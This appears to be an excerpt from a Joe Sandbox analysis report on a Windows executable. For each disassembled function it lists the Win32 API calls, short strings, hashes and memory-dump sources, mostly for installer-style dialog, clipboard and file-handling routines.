Instruction ID: 5cd628679c3206996b44c0f0d1c9f7c2e320434dbef64c8d82388663d9783bcf
Opcode Fuzzy Hash: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
Instruction Fuzzy Hash: A091407190061AEBDF109FA4CD88AAFBBB8EF44741F10407AE545F6190DB788A45CF69

Function 0040447D Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404494
GetDlgItem.USER32(?,00000408), ref: 004044A1
GlobalAlloc.KERNEL32(00000040,?), ref: 004044F0
LoadBitmapW.USER32(0000006E), ref: 00404503
SetWindowLongW.USER32(?,000000FC,Function_000043CD), ref: 0040451D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040452F
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404543
SendMessageW.USER32(?,00001109,00000002), ref: 00404559
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404565
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404575
DeleteObject.GDI32(?), ref: 0040457A
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004045A5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004045B1
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404652
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404675
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404686
GetWindowLongW.USER32(?,000000F0), ref: 004046B0
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004046BF
ShowWindow.USER32(?,00000005), ref: 004046D0
SendMessageW.USER32(?,00000419,00000000,?), ref: 004047CE
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404829
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483E
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404862
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404888
ImageList_Destroy.COMCTL32(?), ref: 0040489D
GlobalFree.KERNEL32(?), ref: 004048AD
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040491D
SendMessageW.USER32(?,00001102,?,?), ref: 004049CB
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004049DA
InvalidateRect.USER32(?,00000000,00000001), ref: 004049FA
ShowWindow.USER32(?,00000000), ref: 00404A4A
GetDlgItem.USER32(?,000003FE), ref: 00404A55
ShowWindow.USER32(00000000), ref: 00404A5C

Strings

M, xrefs: 00404644
N, xrefs: 00404707
@, xrefs: 00404691
, xrefs: 00404A3A

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
Instruction ID: b4b482d55b4410d1430187b36ccef83e55c8bda0955db637de4799104be70721
Opcode Fuzzy Hash: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
Instruction Fuzzy Hash: 5F027BB0900209EFDB119FA4CD45AAEBBB5FB84315F10813AF614B62E0D7799E91CF58

Function 00404BB4 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 290windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00404C16
GetDlgItem.USER32(?,000003EE), ref: 00404C25
GetClientRect.USER32(?,?), ref: 00404C62
GetSystemMetrics.USER32(00000015), ref: 00404C6A
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00404C8B
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00404C9C
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00404CAF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00404CBD
SendMessageW.USER32(?,00001024,00000000,?), ref: 00404CD0
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404CF2
ShowWindow.USER32(?,00000008), ref: 00404D06
GetDlgItem.USER32(?,000003EC), ref: 00404D27
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404D37
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404D4C
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00404D58
GetDlgItem.USER32(?,000003F8), ref: 00404C34

Part of subcall function 00403920: SendMessageW.USER32(00000028,?,00000001,00405280), ref: 0040392E

GetDlgItem.USER32(?,000003EC), ref: 00404D77
CreateThread.KERNEL32(00000000,00000000,Function_00004B48,00000000), ref: 00404D85
CloseHandle.KERNEL32(00000000), ref: 00404D8C
ShowWindow.USER32(00000000), ref: 00404DB3
ShowWindow.USER32(?,00000008), ref: 00404DB8
ShowWindow.USER32(00000008), ref: 00404DFF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404E31
CreatePopupMenu.USER32 ref: 00404E42
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00404E57
GetWindowRect.USER32(?,?), ref: 00404E6A
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00404E8C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EC7
OpenClipboard.USER32(00000000), ref: 00404ED7
EmptyClipboard.USER32 ref: 00404EDD
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00404EE9
GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00404EF3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404F07
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00404F29
SetClipboardData.USER32(0000000D,00000000), ref: 00404F34
CloseClipboard.USER32 ref: 00404F3A

Strings

{, xrefs: 00404E1E

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
Instruction ID: 4a1b14a679f192c254d8bf3bd6cec492735fc4b3fb0f93a90a805189e19306d7
Opcode Fuzzy Hash: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
Instruction Fuzzy Hash: FBB15CB0900208BFDB11AF60DD89EAE7B79FF44355F00817AFA45B61A1CB748A91DF58

Function 0040400B Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 272stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040405A
SetWindowTextW.USER32(?,?), ref: 00404087
SHBrowseForFolderW.SHELL32(?), ref: 0040413F
CoTaskMemFree.OLE32(00000000), ref: 0040414A
lstrcmpiW.KERNEL32(22571808,0044FD98,00000000,?,?), ref: 0040417C
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404198
lstrcatW.KERNEL32(?,22571808), ref: 00404188

Part of subcall function 00405731: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403AE8), ref: 00405744

Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
Part of subcall function 00405AE7: CharPrevW.USER32(?,?,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72

GetDiskFreeSpaceW.KERNEL32(00443D80,?,?,0000040F,?,00443D80,00443D80,?,00000000,00443D80,?,?,000003FB,?), ref: 0040425A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404275
SetDlgItemTextW.USER32(00000000,00000400,0040856C), ref: 004042EE

Strings

A, xrefs: 00404138
22571808, xrefs: 00404176, 0040417B, 00404186

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: 22571808$A
API String ID: 2246997448-1538649988
Opcode ID: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
Instruction ID: 82e0f664371878e3f8136284ca2467dd10f3df84af4d3fe89a4ee6e4629e8810
Opcode Fuzzy Hash: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
Instruction Fuzzy Hash: 91A181B1A00208ABDB11AFA1C885AAF7BB8EF44314F10407FFA05B72D1D77C9A419F59

Function 00406559 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 162filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004E00C8), ref: 00406578
lstrcatW.KERNEL32(00465470,\*.*), ref: 004065C8
lstrcatW.KERNEL32(?,004082C8), ref: 004065E8
lstrlenW.KERNEL32(?), ref: 004065EB
FindFirstFileW.KERNEL32(00465470,?), ref: 004065FF
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?), ref: 004066B5
FindClose.KERNEL32(00000000), ref: 004066C6

Strings

pTF, xrefs: 004065AB
\*.*, xrefs: 004065C2
"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe", xrefs: 004065A9

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"$\*.*$pTF
API String ID: 2035342205-3193183203
Opcode ID: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
Instruction ID: cb8e43480c0494b88bcdaab5263094abc6d8a088fa6e5b396f43e0b3f7cdc2f6
Opcode Fuzzy Hash: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
Instruction Fuzzy Hash: ED51B170800618AACF20AB35CD45A6B7768EF40358F12893BB857761D2DB3D8DA1CB5D

Function 00402218 Relevance: 1.6, APIs: 1, Instructions: 120comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408AEC,00000000,00000001,00408ACC,?,00000000), ref: 00402272

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
Instruction ID: b8756f995b5f19bf65138570f0328ac05a5921d347238761232d12e19ef7feba
Opcode Fuzzy Hash: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
Instruction Fuzzy Hash: 2C414679A00204AFCB04EFA4C988E9E7B79EF48314F20456AF915EB3E1CB79D941CB54

Function 004029F1 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00402A01

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
Instruction ID: 400e5e0b203cfa4d99e013a63ed7a258bcbaee981441f5d34274aa4bdee23deb
Opcode Fuzzy Hash: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
Instruction Fuzzy Hash: 6AE065716042109BE710E778AD89AAF226CDF41328B100677E116F50D1E67889819B1D

Function 00406E34 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
Instruction ID: 195f9c0d2d2971c704648993b79f5dd0ea752a0e03b98457dcbfca0f5118a9d4
Opcode Fuzzy Hash: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
Instruction Fuzzy Hash: D2E16D71D04214DFCF18CF58D880AADB7F1AF45305F1981ABE856AF286D738AA50CF55

Function 0040680A Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
Instruction ID: 00c1500383e690738851ed547f8828f465c8dec40552374253bbad03b7333b94
Opcode Fuzzy Hash: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
Instruction Fuzzy Hash: 59C15C72A012698FCF18DF68C9805ED7BA2FF89314B16812AEC56A7384D734EC55CF84

Function 00404F45 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404F81
ShowWindow.USER32(?), ref: 00404F9E
DestroyWindow.USER32 ref: 00404FB2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404FCE
GetDlgItem.USER32(?,?), ref: 00404FEF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405003
IsWindowEnabled.USER32(00000000), ref: 0040500A
GetDlgItem.USER32(?,00000001), ref: 004050B9
GetDlgItem.USER32(?,00000002), ref: 004050C3
SetClassLongW.USER32(?,000000F2,?), ref: 004050DD
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040512E
GetDlgItem.USER32(?,00000003), ref: 004051D4
ShowWindow.USER32(00000000,?), ref: 004051F6
EnableWindow.USER32(?,?), ref: 00405208
EnableWindow.USER32(?,?), ref: 00405223
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405239
EnableMenuItem.USER32(00000000), ref: 00405240
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405258
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040526B
lstrlenW.KERNEL32(0044FD98,?,0044FD98,004732A0), ref: 00405294
SetWindowTextW.USER32(?,0044FD98), ref: 004052A8
ShowWindow.USER32(?,0000000A), ref: 004053DC

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
Instruction ID: 48c820c9c586f8d8a765c04f05b8e06de5329faa08805170889eeb6d15e0b63f
Opcode Fuzzy Hash: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
Instruction Fuzzy Hash: 1DC19F71500A04EBDB206F61EE89E2B3AA8FB45746F00053EF645B11F1CB799881EF5E

Function 00403C1F Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 212windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00403CD3
GetDlgItem.USER32(?,000003E8), ref: 00403CE7
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403D04
GetSysColor.USER32(?), ref: 00403D15
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403D23
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403D31
lstrlenW.KERNEL32(?), ref: 00403D3C
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403D49
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00403D58

